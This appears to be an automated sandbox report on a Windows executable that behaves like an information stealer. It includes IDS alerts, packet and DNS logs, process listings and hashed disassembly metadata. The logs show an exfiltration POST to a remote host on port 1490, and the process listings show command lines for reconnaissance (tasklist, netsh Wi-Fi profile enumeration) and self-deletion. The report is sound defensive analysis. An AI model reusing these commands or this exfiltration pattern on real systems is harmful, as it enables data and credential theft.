RT_MANIFEST	0x17c3e0	0x1126	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.40387243735763095

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-06T10:33:32.706122+0100	2843856	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2	1	192.168.11.20	49714	89.23.100.233	1490	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 6, 2024 10:33:25.602922916 CET	49713	80	192.168.11.20	104.16.184.241
Dec 6, 2024 10:33:25.698154926 CET	80	49713	104.16.184.241	192.168.11.20
Dec 6, 2024 10:33:25.698331118 CET	49713	80	192.168.11.20	104.16.184.241
Dec 6, 2024 10:33:25.698929071 CET	49713	80	192.168.11.20	104.16.184.241
Dec 6, 2024 10:33:25.793788910 CET	80	49713	104.16.184.241	192.168.11.20
Dec 6, 2024 10:33:25.802279949 CET	80	49713	104.16.184.241	192.168.11.20
Dec 6, 2024 10:33:25.849575043 CET	49713	80	192.168.11.20	104.16.184.241
Dec 6, 2024 10:33:31.722390890 CET	49714	1490	192.168.11.20	89.23.100.233
Dec 6, 2024 10:33:31.967003107 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:31.967283964 CET	49714	1490	192.168.11.20	89.23.100.233
Dec 6, 2024 10:33:31.968342066 CET	49714	1490	192.168.11.20	89.23.100.233
Dec 6, 2024 10:33:31.969856977 CET	49713	80	192.168.11.20	104.16.184.241
Dec 6, 2024 10:33:32.065397978 CET	80	49713	104.16.184.241	192.168.11.20
Dec 6, 2024 10:33:32.065632105 CET	49713	80	192.168.11.20	104.16.184.241
Dec 6, 2024 10:33:32.217813015 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:32.220065117 CET	49714	1490	192.168.11.20	89.23.100.233
Dec 6, 2024 10:33:32.220724106 CET	49714	1490	192.168.11.20	89.23.100.233
Dec 6, 2024 10:33:32.220748901 CET	49714	1490	192.168.11.20	89.23.100.233
Dec 6, 2024 10:33:32.220829964 CET	49714	1490	192.168.11.20	89.23.100.233
Dec 6, 2024 10:33:32.461999893 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:32.462699890 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:32.462708950 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:32.462857962 CET	49714	1490	192.168.11.20	89.23.100.233
Dec 6, 2024 10:33:32.462954998 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:32.463030100 CET	49714	1490	192.168.11.20	89.23.100.233
Dec 6, 2024 10:33:32.463037014 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:32.463198900 CET	49714	1490	192.168.11.20	89.23.100.233
Dec 6, 2024 10:33:32.463366985 CET	49714	1490	192.168.11.20	89.23.100.233
Dec 6, 2024 10:33:32.463538885 CET	49714	1490	192.168.11.20	89.23.100.233
Dec 6, 2024 10:33:32.463779926 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:32.464113951 CET	49714	1490	192.168.11.20	89.23.100.233
Dec 6, 2024 10:33:32.464284897 CET	49714	1490	192.168.11.20	89.23.100.233
Dec 6, 2024 10:33:32.705511093 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:32.705780029 CET	49714	1490	192.168.11.20	89.23.100.233
Dec 6, 2024 10:33:32.705800056 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:32.705950975 CET	49714	1490	192.168.11.20	89.23.100.233
Dec 6, 2024 10:33:32.706001043 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:32.706121922 CET	49714	1490	192.168.11.20	89.23.100.233
Dec 6, 2024 10:33:32.706295967 CET	49714	1490	192.168.11.20	89.23.100.233
Dec 6, 2024 10:33:32.706331968 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:32.706338882 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:32.706640959 CET	49714	1490	192.168.11.20	89.23.100.233
Dec 6, 2024 10:33:32.706646919 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:32.706809044 CET	49714	1490	192.168.11.20	89.23.100.233
Dec 6, 2024 10:33:32.706984997 CET	49714	1490	192.168.11.20	89.23.100.233
Dec 6, 2024 10:33:32.948188066 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:32.948195934 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:32.948456049 CET	49714	1490	192.168.11.20	89.23.100.233
Dec 6, 2024 10:33:32.948622942 CET	49714	1490	192.168.11.20	89.23.100.233
Dec 6, 2024 10:33:32.948713064 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:32.948718071 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:32.948961973 CET	49714	1490	192.168.11.20	89.23.100.233
Dec 6, 2024 10:33:32.948997974 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:32.949002981 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:32.949137926 CET	49714	1490	192.168.11.20	89.23.100.233
Dec 6, 2024 10:33:32.949318886 CET	49714	1490	192.168.11.20	89.23.100.233
Dec 6, 2024 10:33:32.949475050 CET	49714	1490	192.168.11.20	89.23.100.233
Dec 6, 2024 10:33:32.950028896 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:32.950319052 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:32.950339079 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:32.950764894 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:32.951059103 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:32.951368093 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:32.951375008 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:33.190968037 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:33.191272020 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:33.191549063 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:33.192250967 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:33.192559004 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:33.192578077 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:33.192584038 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:33.192847013 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:34.565191031 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:34.571274996 CET	1490	49714	89.23.100.233	192.168.11.20
Dec 6, 2024 10:33:34.571465015 CET	49714	1490	192.168.11.20	89.23.100.233
Dec 6, 2024 10:33:34.572079897 CET	49714	1490	192.168.11.20	89.23.100.233
Dec 6, 2024 10:33:34.822310925 CET	1490	49714	89.23.100.233	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 6, 2024 10:33:25.430927992 CET	57648	53	192.168.11.20	1.1.1.1
Dec 6, 2024 10:33:25.526115894 CET	53	57648	1.1.1.1	192.168.11.20
Dec 6, 2024 10:33:25.821510077 CET	53989	53	192.168.11.20	1.1.1.1
Dec 6, 2024 10:33:25.917038918 CET	53	53989	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 6, 2024 10:33:25.430927992 CET	192.168.11.20	1.1.1.1	0xbb7c	Standard query (0)	icanhazip.com	A (IP address)	IN (0x0001)	false
Dec 6, 2024 10:33:25.821510077 CET	192.168.11.20	1.1.1.1	0x332e	Standard query (0)	140.244.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 6, 2024 10:33:25.526115894 CET	1.1.1.1	192.168.11.20	0xbb7c	No error (0)	icanhazip.com		104.16.184.241	A (IP address)	IN (0x0001)	false
Dec 6, 2024 10:33:25.526115894 CET	1.1.1.1	192.168.11.20	0xbb7c	No error (0)	icanhazip.com		104.16.185.241	A (IP address)	IN (0x0001)	false
Dec 6, 2024 10:33:25.917038918 CET	1.1.1.1	192.168.11.20	0x332e	Name error (3)	140.244.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

icanhazip.com

89.23.100.233:1490

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49713	104.16.184.241	80	4716	C:\Users\user\Desktop\7fE6IkvYWf.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 10:33:25.698929071 CET	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Dec 6, 2024 10:33:25.802279949 CET	537	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 09:33:25 GMT Content-Type: text/plain Content-Length: 15 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=kQDIQAO.dQ1hfwRfQ5myr4pWBqLYU0pN6XvTKTE78Xw-1733477605-1.0.1.1-X8r9vQUQA74PGktFtvqHNagPdckAcEBpDLR6I1UiAzenksOvLLclKaCebrz3UGAOa_HtMueepBJOactefwWMHA; path=/; expires=Fri, 06-Dec-24 10:03:25 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 8edb463bffe18c36-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 31 39 31 2e 39 36 2e 31 35 30 2e 32 30 34 0a Data Ascii: 191.96.150.204

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49714	89.23.100.233	1490	4716	C:\Users\user\Desktop\7fE6IkvYWf.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 10:33:31.968342066 CET	205	OUT	POST /upload HTTP/1.1 Content-Type: multipart/form-data; boundary="7433006e-b941-4ad9-8a07-d2a3839ff4c0" Host: 89.23.100.233:1490 Content-Length: 132873 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 10:33:32.217813015 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 10:33:32.461999893 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 10:33:34.565191031 CET	165	IN	HTTP/1.1 200 OK Server: Werkzeug/3.1.3 Python/3.13.0 Date: Fri, 06 Dec 2024 09:33:34 GMT Content-Type: application/json Content-Length: 61 Connection: close

Target ID:	0
Start time:	04:33:22
Start date:	06/12/2024
Path:	C:\Users\user\Desktop\7fE6IkvYWf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\7fE6IkvYWf.exe"
Imagebase:	0x4a0000
File size:	827'904 bytes
MD5 hash:	2FE8C93D75210E538AEC9062BA29C645
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	04:33:23
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c tasklist
Imagebase:	0xa10000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:33:24
Start date:	06/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6dade0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:33:24
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xd30000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	04:33:24
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd" /C chcp 65001 && netsh wlan show profiles \| findstr All
Imagebase:	0xa10000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	04:33:24
Start date:	06/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6dade0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	04:33:24
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0x890000
File size:	12'800 bytes
MD5 hash:	41146159AA3D41A92B53ED311EE15693
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	04:33:24
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh wlan show profiles
Imagebase:	0xd50000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	04:33:24
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr All
Imagebase:	0x140000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	04:33:38
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpA812.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpA812.tmp.bat
Imagebase:	0xa10000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	04:33:38
Start date:	06/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6dade0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	04:33:38
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0x890000
File size:	12'800 bytes
MD5 hash:	41146159AA3D41A92B53ED311EE15693
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	04:33:38
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	TaskKill /F /IM 4716
Imagebase:	0x910000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	04:33:38
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	Timeout /T 2 /Nobreak
Imagebase:	0x700000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	04:33:38
Start date:	06/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 2148
Imagebase:	0x590000
File size:	482'640 bytes
MD5 hash:	40A149513D721F096DDF50C04DA2F01F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	47.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	100%
Total number of Nodes:	24
Total number of Limit Nodes:	0

Executed Functions

Function 00CB1089 Relevance: 14.7, Strings: 6, Instructions: 7212COMMON

Download Yara Rule

Strings

5q-[, xrefs: 00CB59B0
.s2-, xrefs: 00CB30CB
,U, xrefs: 00CB6E9D
1P#8, xrefs: 00CB75BF
S, xrefs: 00CB39A1, 00CB39A6
;7X, xrefs: 00CB7FD3

Memory Dump Source

Source File: 00000000.00000002.4877616232.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_7fE6IkvYWf.jbxd

Similarity

API ID:
String ID: ;7X$,U$.s2-$1P#8$5q-[$S
API String ID: 0-2442268200
Opcode ID: 2292b3eb60f87055f056abe3f5c34f608a3fd9b564b867da19a2dc09c29ffa25
Instruction ID: 9ae63d8de216b1964a2cca57fd4eed8604f5f14373a07a3bcd2bd58ec8aa2289
Opcode Fuzzy Hash: 2292b3eb60f87055f056abe3f5c34f608a3fd9b564b867da19a2dc09c29ffa25
Instruction Fuzzy Hash: 2DE33075E002299FCB64DF69D850A9DB3B6EB89310F1181EAD819F7350DB71AE81CF90

Function 00CB1098 Relevance: 14.7, Strings: 6, Instructions: 7197COMMON

Download Yara Rule

Strings

5q-[, xrefs: 00CB59B0
.s2-, xrefs: 00CB30CB
,U, xrefs: 00CB6E9D
1P#8, xrefs: 00CB75BF
S, xrefs: 00CB39A1, 00CB39A6
;7X, xrefs: 00CB7FD3

Memory Dump Source

Source File: 00000000.00000002.4877616232.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_7fE6IkvYWf.jbxd

Similarity

API ID:
String ID: ;7X$,U$.s2-$1P#8$5q-[$S
API String ID: 0-2442268200
Opcode ID: e5d1264b9c9cdc0e799ca02d652d208fcbce110bf7e42760cd13cef91ca75f6a
Instruction ID: 3d80fb7d25ac0d624eceb70bc256e1e0404775c6760009c0cdb4bcdcdb0c1e58
Opcode Fuzzy Hash: e5d1264b9c9cdc0e799ca02d652d208fcbce110bf7e42760cd13cef91ca75f6a
Instruction Fuzzy Hash: 89E33075E002299FCB64DF69D850A9DB3B6EB89310F1181EAD819F7350DB71AE81CF90

Function 07458A80 Relevance: 12.5, Strings: 5, Instructions: 6265COMMON

Download Yara Rule

Strings

%Z3, xrefs: 0745DCF1
*'$, xrefs: 0745B4F8
u'Ds, xrefs: 0745B987
0A, xrefs: 0745AC16
9z@, xrefs: 0745B95A

Memory Dump Source

Source File: 00000000.00000002.4889663257.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7450000_7fE6IkvYWf.jbxd

Similarity

API ID:
String ID: *'$$%Z3$0A$9z@$u'Ds
API String ID: 0-3302669497
Opcode ID: 4f6180568eb5470f7813c5b5a031129359f168f0b543df3fa9dc9babd5261b33
Instruction ID: 790b815d2a6bc456c21d113968e6feb107f5bcc2149e65a51ee653e7c5b0529e
Opcode Fuzzy Hash: 4f6180568eb5470f7813c5b5a031129359f168f0b543df3fa9dc9babd5261b33
Instruction Fuzzy Hash: F3D30975E002199FCB54DFA8C890A9EBBB6BF88314F2481E9D409E7355DB35AE85CF40

Function 064B0040 Relevance: 6.1, Strings: 3, Instructions: 2346COMMON

Download Yara Rule

Strings

G, xrefs: 064B03C0
L, xrefs: 064B0069
G, xrefs: 064B0062

Memory Dump Source

Source File: 00000000.00000002.4887429400.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64b0000_7fE6IkvYWf.jbxd

Similarity

API ID:
String ID: G$G$L
API String ID: 0-4176886901
Opcode ID: b38af93baa7c4de2b45235cbfad5bad943530966a8bb2c4b403b6c0910efe2b9
Instruction ID: 9852f252dd5fad6135a17c3fc63e8ba609a08cb6a1442bf5e5da899845f8d81f
Opcode Fuzzy Hash: b38af93baa7c4de2b45235cbfad5bad943530966a8bb2c4b403b6c0910efe2b9
Instruction Fuzzy Hash: C5235375E011258FCB54DF68C99469AB7F2FB88300F1585AAD809EB345DB35EE82CF90

Function 07722A48 Relevance: 6.0, Strings: 3, Instructions: 2214COMMON

Download Yara Rule

Strings

>*B, xrefs: 07723D63
r6), xrefs: 07724213
d, xrefs: 07723696

Memory Dump Source

Source File: 00000000.00000002.4889795988.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7720000_7fE6IkvYWf.jbxd

Similarity

API ID:
String ID: >*B$r6)$d
API String ID: 0-3739268421
Opcode ID: 71e5f4b1ec93b92938e571d07842830d6af2c9009d486f52697455c77bc24045
Instruction ID: 5f5906359ff70c53ce87cbd1b98f7a4bbd6be376b3d50497df873dfaf5ef30af
Opcode Fuzzy Hash: 71e5f4b1ec93b92938e571d07842830d6af2c9009d486f52697455c77bc24045
Instruction Fuzzy Hash: F9138476E002398FDB54CF58C884A99B7F2BB88350F1586AAD819EB351D735DD86CF80

Function 07450040 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 702
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(?,?), ref: 07450A42

Strings

!, xrefs: 07450400
", xrefs: 07450425

Memory Dump Source

Source File: 00000000.00000002.4889663257.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7450000_7fE6IkvYWf.jbxd

Similarity

API ID: CreateSnapshotToolhelp32
String ID: !$"
API String ID: 3332741929-3796260231
Opcode ID: 505a54442a85c3e9e3cdad8b6dcafc9ec5d0a02df92d9d5ff99156f96c10e077
Instruction ID: ce0b77bf8e5391969e4a638cbca2806b85697579deb2bcbb7894af27a8228aa5
Opcode Fuzzy Hash: 505a54442a85c3e9e3cdad8b6dcafc9ec5d0a02df92d9d5ff99156f96c10e077
Instruction Fuzzy Hash: 0B32B3B0B011255BDB44ABF8D874BAF76ABABC8700F20852DD509E7385CE79DD058BE1

Function 00CBD800 Relevance: 5.8, Strings: 3, Instructions: 2011COMMON

Download Yara Rule

Strings

+];, xrefs: 00CBD886
2Ta, xrefs: 00CBF2A9
%2&b, xrefs: 00CBE8AE

Memory Dump Source

Source File: 00000000.00000002.4877616232.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_7fE6IkvYWf.jbxd

Similarity

API ID:
String ID: %2&b$+];$2Ta
API String ID: 0-3369895701
Opcode ID: 355df880a1545f8734ac52da5447a13c239c59fea1d52d5ea3d4ec6125a3d938
Instruction ID: 80d12b2f717cb49051be090c6a1b4d8953dd75e93e06fca6caf5d6699d68de9f
Opcode Fuzzy Hash: 355df880a1545f8734ac52da5447a13c239c59fea1d52d5ea3d4ec6125a3d938
Instruction Fuzzy Hash: 40036C75B012198FCB24DF69C894A9DBBB2BF88300F1581A9E509EB361DB75DE85CF40

Function 07455428 Relevance: 4.8, Strings: 2, Instructions: 2282COMMON

Download Yara Rule

Strings

8G,[, xrefs: 074563D0
2%X, xrefs: 074568FD

Memory Dump Source

Source File: 00000000.00000002.4889663257.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7450000_7fE6IkvYWf.jbxd

Similarity

API ID:
String ID: 2%X$8G,[
API String ID: 0-2476637852
Opcode ID: 1593df06d9d5c0c38690b698400583edb12fc53d73b31eee9fa24dec957653d7
Instruction ID: a128143c4294400f60dddb7ccea7f77cbe868f0c023fe6b4fdedc56acee8cf98
Opcode Fuzzy Hash: 1593df06d9d5c0c38690b698400583edb12fc53d73b31eee9fa24dec957653d7
Instruction Fuzzy Hash: 5D13A075F012258FCB54DF68C8546EEB7B2AB88300F1585AADC0AEB345DB359D86CF90

Function 07450EC8 Relevance: 3.1, Strings: 2, Instructions: 593
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

K5Y, xrefs: 074515A9
)w#m, xrefs: 07450F6B

Memory Dump Source

Source File: 00000000.00000002.4889663257.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7450000_7fE6IkvYWf.jbxd

Similarity

API ID:
String ID: K5Y$)w#m
API String ID: 0-3815108192
Opcode ID: 46b1d1526f115330835932b993563f5b277444dc0898e653984c622377769dcc
Instruction ID: 3dac775734417939b8920db3e39d5f591626b528f2fa8de6d1d25efad5b93a81
Opcode Fuzzy Hash: 46b1d1526f115330835932b993563f5b277444dc0898e653984c622377769dcc
Instruction Fuzzy Hash: A322E872F001299FCB04DB68C8909AEBBB3BBC435075A856ADD09EB355DA31DC46CBD0

Function 064B3F8B Relevance: 3.0, Strings: 2, Instructions: 503
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#5}, xrefs: 064B4411
;L(|, xrefs: 064B422A

Memory Dump Source

Source File: 00000000.00000002.4887429400.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64b0000_7fE6IkvYWf.jbxd

Similarity

API ID:
String ID: #5}$;L(|
API String ID: 0-3985745917
Opcode ID: 2350d0f43ca9cd79fc9a0c69cc80bba9d5c5336c81259a2a9011973a5a5e55dc
Instruction ID: be98c574cb7ff2d169037132acd642efeb7773f119fb77c7b1b8113fbb017126
Opcode Fuzzy Hash: 2350d0f43ca9cd79fc9a0c69cc80bba9d5c5336c81259a2a9011973a5a5e55dc
Instruction Fuzzy Hash: B202A076F011288FDB54CFADC89099AF7F3AB8831071A856AD809EB345DB75DC46CB90

Function 07720040 Relevance: 3.0, Strings: 1, Instructions: 1728COMMON

Download Yara Rule

Strings

H97, xrefs: 07721E82

Memory Dump Source

Source File: 00000000.00000002.4889795988.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7720000_7fE6IkvYWf.jbxd

Similarity

API ID:
String ID: H97
API String ID: 0-463401740
Opcode ID: 58e6b4afbea2e7db8031f45cfd978faeca2cc37e11d9ed952823fa6516f3191f
Instruction ID: c262d99f2b3356996761ef95687aa3ffed3020d33cc3231458a0e60664896583
Opcode Fuzzy Hash: 58e6b4afbea2e7db8031f45cfd978faeca2cc37e11d9ed952823fa6516f3191f
Instruction Fuzzy Hash: 15F23EB6A011298FDB64CF19CC84A99B7B3BBC8354F698699D419E7351DB30ED82CF40

Function 00CB96D0 Relevance: 2.9, Strings: 2, Instructions: 386
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d8, xrefs: 00CB99EF
"n', xrefs: 00CB9998

Memory Dump Source

Source File: 00000000.00000002.4877616232.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_7fE6IkvYWf.jbxd

Similarity

API ID:
String ID: d8$"n'
API String ID: 0-122169730
Opcode ID: 63f51c1bd2378560305e33354b109c0ebaf199c6a20128f9556b6610cd3d1ae7
Instruction ID: 8180d6f6b51d7d62d929da9fa7bafaa4f41968ca06d8f88746c7c750aae36622
Opcode Fuzzy Hash: 63f51c1bd2378560305e33354b109c0ebaf199c6a20128f9556b6610cd3d1ae7
Instruction Fuzzy Hash: 0AD17B75B103048FCB58DFA9C89469DB7F3EF89300B658169E50AEB362EB749D06CB41

